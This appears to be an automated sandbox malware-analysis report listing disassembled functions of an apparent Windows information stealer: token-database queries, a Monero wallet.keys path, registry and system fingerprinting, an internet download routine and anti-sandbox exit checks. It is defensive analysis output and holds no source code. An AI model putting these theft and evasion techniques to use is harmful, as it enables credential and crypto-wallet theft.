Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: e797a7e63c88a5729c2f7117df8b214a3b8947fa701ee749d2fe07bb8991e307
Instruction ID: 8266b285171ed2f1f65630110f80747acbbb1e01184bba8ddb65bd8a64badfee
Opcode Fuzzy Hash: e797a7e63c88a5729c2f7117df8b214a3b8947fa701ee749d2fe07bb8991e307
Instruction Fuzzy Hash: E7B11F71A10108ABDF14FBA0DD96EEE737CAF55300F404169F506A6593EF346A49CBB2

Function 000A4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 000A4FCA
RtlAllocateHeap.NTDLL(00000000), ref: 000A4FD1
InternetOpenA.WININET(000C0DDF,00000000,00000000,00000000,00000000), ref: 000A4FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 000A5011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 000A5041
InternetCloseHandle.WININET(?), ref: 000A50B9
InternetCloseHandle.WININET(?), ref: 000A50C6

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: c4f59436a14678fcbbb4fe975875e6d67f7d14a57268b6f51a145f5472478688
Instruction ID: 286bcd1bb16c0427af71853810283e95213b1f7c13a335e896f992fec43dd34d
Opcode Fuzzy Hash: c4f59436a14678fcbbb4fe975875e6d67f7d14a57268b6f51a145f5472478688
Instruction Fuzzy Hash: 5B31D7B4A40218ABDB20CF94DC89BDDB7B4FB48705F5081D9FB09A7281D7706AC58F99

Function 000B83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 000B8426
wsprintfA.USER32 ref: 000B8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 000B847B
RegCloseKey.ADVAPI32(00000000), ref: 000B848C
RegCloseKey.ADVAPI32(00000000), ref: 000B8499

Part of subcall function 000BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 000BA7E6

RegQueryValueExA.KERNEL32(00000000,0139EB38,00000000,000F003F,?,00000400), ref: 000B84EC
lstrlen.KERNEL32(?), ref: 000B8501
RegQueryValueExA.KERNEL32(00000000,0139EAA8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,000C0B34), ref: 000B8599
RegCloseKey.KERNEL32(00000000), ref: 000B8608
RegCloseKey.ADVAPI32(00000000), ref: 000B861A

Strings

%s\%s, xrefs: 000B844D

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 2104207c0a88d5c69f952346ace433486551353c41b5ac5dafb453624688b566
Instruction ID: 75686cdd1735744f0586a88c8f456432a3aa3513e3610e47f3c59ee9b244cd1e
Opcode Fuzzy Hash: 2104207c0a88d5c69f952346ace433486551353c41b5ac5dafb453624688b566
Instruction Fuzzy Hash: 7521E971A50218ABDB64DB54DC85FE9B7B8FB48700F00C5D8E609AA140DF716A85CFE4

Function 000B7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 000B76A4
RtlAllocateHeap.NTDLL(00000000), ref: 000B76AB
RegOpenKeyExA.KERNEL32(80000002,0138B9D8,00000000,00020119,00000000), ref: 000B76DD
RegQueryValueExA.KERNEL32(00000000,0139E898,00000000,00000000,?,000000FF), ref: 000B76FE
RegCloseKey.ADVAPI32(00000000), ref: 000B7708

Strings

Windows 11, xrefs: 000B76BD

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 9ab183bf5e75a15a36b83c090a8cf3cd7b3058c71337fcfecb2c2d9fa5f6c5c0
Instruction ID: 58afac47dbe995b9f235d2805c769f48e911958cd3f384413d75cab10ce5d328
Opcode Fuzzy Hash: 9ab183bf5e75a15a36b83c090a8cf3cd7b3058c71337fcfecb2c2d9fa5f6c5c0
Instruction Fuzzy Hash: 750162B5A84208BBD700DBE4EC8DFADB7B8EB48701F104054FA09DB291DA74A904CB51

Function 000B7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 000B7734
RtlAllocateHeap.NTDLL(00000000), ref: 000B773B
RegOpenKeyExA.KERNEL32(80000002,0138B9D8,00000000,00020119,000B76B9), ref: 000B775B
RegQueryValueExA.KERNEL32(000B76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 000B777A
RegCloseKey.ADVAPI32(000B76B9), ref: 000B7784

Strings

CurrentBuildNumber, xrefs: 000B7771

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: d6bd4990ec0f798e727ab9b84b9bff367831c985c46ee406467abf2f4b72d4e4
Instruction ID: d971b09b12385b88d75610cad34e8238d88e6c4a71143581dc93c78b82e86f52
Opcode Fuzzy Hash: d6bd4990ec0f798e727ab9b84b9bff367831c985c46ee406467abf2f4b72d4e4
Instruction Fuzzy Hash: 99011CB5A40344BBD710DBD4EC8DFAEB7B8EB44701F104555FA059B291D6706500CF52

Function 000B40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000B40D5
RegOpenKeyExA.KERNEL32(80000001,0139E6D8,00000000,00020119,?), ref: 000B40F4
RegQueryValueExA.ADVAPI32(?,0139EBE0,00000000,00000000,00000000,000000FF), ref: 000B4118
RegCloseKey.ADVAPI32(?), ref: 000B4122
lstrcat.KERNEL32(?,00000000), ref: 000B4147
lstrcat.KERNEL32(?,0139EE08), ref: 000B415B

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: aa1107bf0c3273f1551e5c36f084f13a872ce6fa7e197aa421cd9ce3083cf619
Instruction ID: 9980f08ffd74c18c94737c6c31f110b5dfa316c8154bb315bbce4ddafd08f6eb
Opcode Fuzzy Hash: aa1107bf0c3273f1551e5c36f084f13a872ce6fa7e197aa421cd9ce3083cf619
Instruction Fuzzy Hash: 74419E76D40108A7DB14EBF0EC9AFFD737DA788300F004559B7155B182EA756B888BD2

Function 000B69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,01390600), ref: 000B98A1
Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,01390588), ref: 000B98BA
Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,01390798), ref: 000B98D2
Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,013907B0), ref: 000B98EA
Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,013905A0), ref: 000B9903
Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,013988C0), ref: 000B991B
Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,01386800), ref: 000B9933
Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,01386A00), ref: 000B994C
Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,01390618), ref: 000B9964
Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,013905B8), ref: 000B997C
Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,013905D0), ref: 000B9995
Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,013907C8), ref: 000B99AD
Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,01386700), ref: 000B99C5
Part of subcall function 000B9860: GetProcAddress.KERNEL32(75900000,01390648), ref: 000B99DE

Part of subcall function 000BA740: lstrcpy.KERNEL32(000C0E17,00000000), ref: 000BA788

Part of subcall function 000A11D0: ExitProcess.KERNEL32 ref: 000A1211

Part of subcall function 000A1160: GetSystemInfo.KERNEL32(?), ref: 000A116A
Part of subcall function 000A1160: ExitProcess.KERNEL32 ref: 000A117E

Part of subcall function 000A1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 000A112B
Part of subcall function 000A1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 000A1132
Part of subcall function 000A1110: ExitProcess.KERNEL32 ref: 000A1143

Part of subcall function 000A1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 000A123E
Part of subcall function 000A1220: __aulldiv.LIBCMT ref: 000A1258
Part of subcall function 000A1220: __aulldiv.LIBCMT ref: 000A1266
Part of subcall function 000A1220: ExitProcess.KERNEL32 ref: 000A1294

Part of subcall function 000B6770: GetUserDefaultLangID.KERNEL32 ref: 000B6774

Part of subcall function 000A1190: ExitProcess.KERNEL32 ref: 000A11C6

Part of subcall function 000B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000A11B7), ref: 000B7880
Part of subcall function 000B7850: RtlAllocateHeap.NTDLL(00000000), ref: 000B7887
Part of subcall function 000B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 000B789F

Part of subcall function 000B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000B7910
Part of subcall function 000B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 000B7917
Part of subcall function 000B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 000B792F

Part of subcall function 000BA9B0: lstrlen.KERNEL32(?,01398A60,?,\Monero\wallet.keys,000C0E17), ref: 000BA9C5
Part of subcall function 000BA9B0: lstrcpy.KERNEL32(00000000), ref: 000BAA04
Part of subcall function 000BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 000BAA12

Part of subcall function 000BA8A0: lstrcpy.KERNEL32(?,000C0E17), ref: 000BA905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01398930,?,000C110C,?,00000000,?,000C1110,?,00000000,000C0AEF), ref: 000B6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 000B6AE8
CloseHandle.KERNEL32(00000000), ref: 000B6AF9
Sleep.KERNEL32(00001770), ref: 000B6B04
CloseHandle.KERNEL32(?,00000000,?,01398930,?,000C110C,?,00000000,?,000C1110,?,00000000,000C0AEF), ref: 000B6B1A
ExitProcess.KERNEL32 ref: 000B6B22

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: e2f0783597af5ae27046d1d09121b201b228bdadfd87f9f8acc15fca0bc35383
Instruction ID: 0f2e05bdad9aea3390484ab07de182089e6266d96ddbfcb2f00a81c5a801bd39
